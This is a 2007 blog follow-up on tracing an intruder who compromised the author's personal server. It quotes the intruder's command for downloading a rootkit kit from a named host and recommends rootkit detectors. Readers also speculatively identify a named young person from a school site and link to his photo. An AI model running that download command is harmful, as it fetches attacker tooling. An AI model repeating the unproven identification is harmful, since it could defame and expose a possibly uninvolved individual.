3 Nov 2007

Holiday cracking - redux

The "holiday cracking" story got far more attention than I ever would have imagined. If I had known it would get such massive attention, I sure would have done a more thorough job. Interestingly, after the posting I have received some pretty interesting feedback - even an email from the cracker himself! It sure helps to get on Slashdot and be posted on Bruce Schneier's blog!

In fact, when the story hit /., I first thought that I was finally being DoS'ed by an angry exposed cracker. But I quickly found out that it was the "normal" Slashdot effect. You can see the traffic increase in the graph: the first increase is from Schneier (week 33), the second is Slashdot (week 34).

First, one clarification. The cracked server was an (old and rusty) personal server, hosting nothing more than a backup of some digital pictures, hooked up through ADSL. The server was not part of a production system running critical services. The only services exposed to the Internet were SSH and Apache (no PHP, as I recall). Hunting down this little cracker was just for fun.

It was also interesting to read the comments. A lot of the usual nonsense crap ("I pity the fool who cracks your system, fool!"), some more fun details ("He should've symlinked .bash_history to /dev/random!"), but also some very helpful and constructive comments. I would in particular mention the SANS whitepaper "Dead Linux Machines Do Tell Tales" by James Fung - a couple of years old, but still a very interesting read. Another good tip was the tools chkrootkit and rkhunter, both helpful in finding and identifying rootkits.

Several Polish readers have sent me translations of the names used in the crack:

  • "psotnic" - the bot the cracker used; it translates to "rascal" or "urchin". See Wikipedia's entry on psotnic for more info.
  • "4lo.bydg.pl" - IV High School in Bydgoszcz. The IP address 83.19.148.250 resolves to this host.
  • "matys" - A popular nickname. Short version of "Mateusz" (male).
  • "pliki" - files.

So wget http://83.19.148.250/~matys/pliki/shv5.tar.gz makes more sense.

A Polish reader, Michal Bartkowiak, did some more digging on the Polish web pages and found more interesting stuff:

Ok, so let's take a look at this school website (4lo.bydg.pl). The search option is in the menu on the left side ("szukaj" in Polish). But search for what? Maybe "matys".. nothing. I'm assuming that the name of this account's owner is "Mateusz".. three results. Click on the first one (http://4lo.bydg.pl//index.php?option=com_content&task=section&id=44&Itemid=93) and you will get a list of names from a competition. Three persons with the first name "Mateusz". Wait a minute, the surname of the first guy is "Lapinski" (written without Polish fonts), which looks very familiar to LaPi. And it makes sense in our language to create a nick like this from the surname "Lapinski". While Lapinski is not a very popular name, it still can be just coincidence or my imagination. Or another hacked account of course.

Anyway, that's a good time for Google. Searching for "matys site:4lo.bydg.pl" shows some activity on this account, e.g. index of /~matys/foty/02-07-2007 ("foty" means "photos"). Searching for "lapi+psotnic" returns a userlist generated by psotnic version 0.2.11. Guess what? lapi is there. With an IP from a Polish ISP (http://hoth.amu.edu.pl/~esio/smieci/hub.ul).

Actually, when I searched for "lapi+psotnic" on Google, a web site called exy.hu popped up. This site has all kinds of crack software available, lists of usernames/passwords for a bunch of porn sites and a whole range of crew pictures. And guess what, there is a picture file there named lapi.jpg! (Fetch it here: http://exy.hu/kepek/crew/Lapi/lapi.jpg). Is this our LaPi?

I also received an interesting mail from a former student and sysadmin of panorama.sth.ac.at. He could tell me that the host campus19.panorama.sth.ac.at was not NATed, but in fact one of the few IP addresses there that still has a FQDN. So he had both the name and the room number of the alleged cracker! He would alert the administrators on-site and come back to me as soon as they had investigated further. That was one month ago, but unfortunately I have still not heard anything.